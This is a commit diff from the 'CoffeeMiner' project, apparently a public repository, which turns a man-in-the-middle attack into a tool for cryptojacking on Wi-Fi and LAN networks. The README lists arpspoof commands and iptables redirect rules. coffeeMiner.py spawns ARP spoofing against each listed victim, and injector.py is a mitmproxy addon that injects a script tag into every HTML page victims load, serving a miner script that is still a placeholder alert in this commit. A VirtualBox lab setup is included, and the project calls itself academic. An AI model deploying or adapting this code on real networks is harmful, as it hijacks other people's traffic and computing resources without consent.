Browse Source

working

master
arnaucode 7 years ago
parent
commit
e586ddbeb2
7 changed files with 118 additions and 58 deletions
  1. +10
    -47
      README.md
  2. +2
    -2
      coffeeMiner.py
  3. +25
    -6
      injector.py
  4. +2
    -2
      install.sh
  5. +1
    -1
      miner_script/script.js
  6. BIN
      network.png
  7. +78
    -0
      virtualbox_scenario_instructions.md

+ 10
- 47
README.md

@ -1,12 +1,12 @@
# CoffeeMiner
Collaborative Coffee Mining Pool.
Collaborative (mitm) cryptocurrency mining pool in wifi networks
**Warning: this project is only with academic purposes.**
**Warning: this project is for academic/research purposes only.**
## Concept
- Performs a MITM attack
- Performs a MITM attack to all selected victims
- Injects a js script in all the HTML pages requested by the victims
- The js script injected contains a cryptocurrency miner
- All the devices victims connected to the Lan network, will be mining for the CoffeeMiner
@ -18,53 +18,16 @@ Collaborative Coffee Mining Pool.
bash install.sh
```
- edit victims.txt with one IP per line
- run.py
- edit coffeeMiner.py, line 28, with the coffeeMiner httpserver IP:
```py
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
```
python run.py ipgateway
- run.py
```
---
#### Manual use
- needs to have installed **mitmproxy**
https://mitmproxy.org/
- installation:
```
sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
pip3 install --user mitmproxy
```
- needs python 3.*
- configure IPTABLES
python3 coffeeMiner.py ipgateway
```
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
![network](https://raw.githubusercontent.com/arnaucode/coffeeMiner/master/network.png "network")
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
```
- arpspoof to the victims
```
arpspoof -i eth0 -t <victim_ip> <gateway_ip>
arpspoof -i eth0 -t <gateway_ip> <victim_ip>
```
- execute the httpServer.py that will serve the script.js that contains the minner:
```
python httpServer.py
```
- execute the mitmproxy with the injector.py script:
```
#~/.local/bin/mitmdump -s "injector.py http://127.0.0.1:8000/script.js"
```
A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md

run.py → coffeeMiner.py

@ -22,10 +22,10 @@ for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
# start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python httpServer.py' &")
os.system("xterm -hold -e 'python3 httpServer.py' &")
# start the mitmproxy
os.system("~/.local/bin/mitmdump -s 'injector.py http://127.0.0.1:8000/script.js'")
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
'''

+ 25
- 6
injector.py

@ -2,25 +2,44 @@
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from mitmproxy import ctx, http
import argparse
class Injector:
'''
def load(self, loader):
loader.add_option(
"scr_url", str, "", "script_url to inject"
)
'''
def __init__(self, path):
self.path = path
def response(self, flow: http.HTTPFlow) -> None:
if ctx.options.scr_url:
#print("hola hola hola")
#print(self.path)
if self.path:
html = BeautifulSoup(flow.response.content, "html.parser")
if html.body:
print(self.path)
print(flow.response.headers["content-type"])
if flow.response.headers["content-type"] == 'text/html':
print("uuuuuu")
print(flow.response.headers["content-type"])
print("asdf asdf asdf asdf asdf")
print("-----")
print("mmmmm")
script = html.new_tag(
"script",
src=context.src_url,
src=self.path,
type='application/javascript')
html.body.insert(0, script)
flow.response.content = str(html).encode("utf8")
context.log("Script injected.")
print("Script injected.")
def start():
parser = argparse.ArgumentParser()
parser.add_argument("path", type=str)
args = parser.parse_args()
return Injector(args.path)
addons = [Injector()]
#addons = [Injector()]

+ 2
- 2
install.sh

@ -1,10 +1,10 @@
#TODO put --yes to all installation commands
# install arpspoof (dsniff)
sudo apt-get install dsniff
apt-get -y install dsniff
# install mitmproxy
sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
apt-get -y install python3-dev python3-pip libffi-dev libssl-dev
pip3 install --user mitmproxy
# install BeautifulSoup

+ 1
- 1
miner_script/script.js

@ -1 +1 @@
alert("this will be the minner");
alert("if you can read this, the script has been injected. This will be the minner");

BIN
network.png

Before After
Width: 501  |  Height: 501  |  Size: 76 KiB

+ 78
- 0
virtualbox_scenario_instructions.md

@ -0,0 +1,78 @@
### Instructions to setup VirtualBox scenario
In each machine, remember to setup the dns server, for example, in /etc/resolv.conf:
```
nameserver 8.8.8.8
```
### Victim
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
```
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.20
netmask 255.255.255.0
gateway 10.0.2.15
```
### Attacker
- network adapter:
- Host-only Adapter
- /etc/network/interfaces:
```
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 10.0.2.10
netmask 255.255.255.0
gateway 10.0.2.15
```
### Gateway
- network adapter:
- Bridged Adapter
- Host-only Adapter
- /etc/network/interfaces:
```
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet static
address 10.0.2.15
netmask 255.255.255.0
```
Clean IPTABLES:
```
iptables --flush
iptables --table nat --flush
```
Configure the Gateway machine as a router:
```
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT
```

Loading…
Cancel
Save